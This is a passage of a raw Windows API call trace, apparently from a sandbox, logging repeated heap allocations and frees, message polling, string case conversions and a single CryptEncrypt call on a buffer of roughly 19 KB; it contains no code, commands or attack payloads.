[0086.751] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0086.751] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0086.751] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0086.751] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.751] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.751] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.751] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.751] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0086.751] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0086.751] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0086.751] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0086.751] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0086.751] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0086.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0086.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9d18, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0086.752] CryptEncrypt (in: hKey=0x9a3f40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x4b96, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x4b98) returned 1 [0086.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0086.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0086.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0086.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0086.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ce8 [0086.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e80 [0086.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0086.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0086.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0086.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0086.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cd0 [0086.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ce8 [0086.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e80 [0086.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0086.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0086.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0086.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0086.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ce8 [0086.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d18 [0086.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0086.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0086.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0086.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0086.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0086.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d18 [0086.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0086.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e80 [0086.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0086.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0086.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0086.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0086.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0086.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e80 [0086.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0086.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0086.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0086.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0086.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0086.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e80 [0086.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0086.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9eb0 [0086.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0086.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0086.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0086.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0086.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0086.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9eb0 [0086.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0086.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0086.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0086.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0086.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0086.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0086.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0086.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0086.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0086.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0086.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0086.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0086.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0086.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0086.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0086.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0086.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0086.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0086.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0086.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0086.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0086.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0086.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0086.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0086.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0086.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0086.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0086.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0086.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0086.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0086.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0086.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0086.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0086.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0086.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0086.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0086.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0086.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0086.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0086.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0086.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684c8 | out: hHeap=0x2af0000) returned 1 [0086.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0086.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0086.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0086.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0086.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7698 [0086.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0086.755] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0086.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0086.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7160 [0086.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0086.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0086.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0086.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0086.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0086.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0086.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0086.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0086.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0086.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0086.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0086.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0086.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0086.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0086.755] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0086.755] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0086.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0086.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0086.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0086.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0086.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0086.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0086.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0086.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0086.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0086.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0086.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0086.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0086.756] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0086.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0086.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0086.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0086.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0086.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0086.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0086.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0086.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0086.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0086.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0086.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0086.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0086.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0086.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0086.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0086.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0086.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0086.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0086.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7020 [0086.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0086.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0086.757] CharLowerBuffW (in: lpsz="byte[19352]", cchLength=0xb | out: lpsz="byte[19352]") returned 0xb [0086.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69670 [0086.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0086.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0086.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0086.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0086.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0086.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0086.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0086.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0086.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0086.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0086.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0086.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0086.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0086.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0086.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0086.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4b98) returned 0x2a98418 [0086.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0086.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0086.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0086.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0086.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0086.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0086.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0086.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0086.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0086.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0086.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fe0 [0086.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69940 [0086.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0086.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0086.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0086.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0086.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69670 | out: hHeap=0x2af0000) returned 1 [0086.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7020 | out: hHeap=0x2af0000) returned 1 [0086.758] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0086.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0086.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7140 [0086.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69b20 [0086.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0086.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0086.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 